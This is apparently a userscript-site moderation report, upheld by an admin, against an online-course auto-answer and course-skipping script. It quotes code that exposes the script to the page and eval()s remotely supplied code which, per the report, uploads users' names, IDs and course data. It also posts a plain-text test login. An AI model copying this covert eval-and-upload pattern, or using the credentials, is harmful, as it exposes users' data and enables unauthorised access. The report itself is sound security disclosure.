FCQ网课通助手[全网题库][通用智能适配答题][刷课]在2024-07-28 被檢舉,因為:未允許的外部代碼
在第911行
At line 911:function opeationUi(menu) { this.fcq_xm_answer = null; this.$ = $; this.menu = menu; this.xm_window=window this.initMenu(); this.config = {} unsafeWindow.mainProcedure=this window.mainProcedure=this return this; }这个函数通过把window赋值到xm_window,然后把this赋值到unsafeWindow,隐蔽的将this设置到原网页的mainProcedure上,然后通过window.mainProcedure.xm_window.GM_setValue这个函数,由前端调用动态代码
This function assigns the window to xm_window and then assigns this to unsafeWindow, covertly setting this to the original webpage's mainProcedure. Then, using window.mainProcedure.xm_window.GM_setValue, the function allows dynamic code execution to be called from the front end.
具体执行位置为第1531行
The specific execution location is at line 1531:var initSet=`var VideoSpeed=1`; if(!GM_getValue('initSet')){ GM_setValue('initSet',initSet) }; eval(GM_getValue('initSet'))这段代码是本应该执行“var initSet=`var VideoSpeed=1`”,但在前端调用gm_setvalue修改后,此值已变为恶意代码,实际代码引用地址为:https://tcb-w644nfbyxrttaih-2cpr71dbf4b7-1304481250.tcloudbaseapp.com/static/js/pages-index-list.b35c5d5a.js,此行为实际上已经违反规定。
经过对此代码进行分析后,此代码会获取用户的姓名、用户id等上传至第三方服务器,并且在后台静默获取所有课程信息,不经过用户允许就上传
This code is supposed to execute var initSet = "var VideoSpeed = 1", but after the front-end call to gm_setvalue modifies it, this value changes to malicious code. The actual code reference URL is: https://tcb-w644nfbyxrttaih-2cpr71dbf4b7-1304481250.tcloudbaseapp.com/static/js/pages-index-list.b35c5d5a.js. This behavior indeed violates regulations.
After analyzing this code, it is found that it obtains the user's name, user ID, and other information, uploading it to a third-party server. Additionally, it silently collects all course information in the background and uploads it without the user's consent.
请解释原因
please explain
Testwebsite: https://i.mooc.chaoxing.com/
TestUserName and TestPassword: 15637670952 wdm20020810
The evidence provided is that additional functionality has been added, which the script does not have
自檢舉提交以來,腳本已被修改過。
This script has had 3 previous upheld or fixed reports.
webstudy (the reported user) has made:
管理員已通過該檢舉。
the script has functionality to run eval() on unknown external code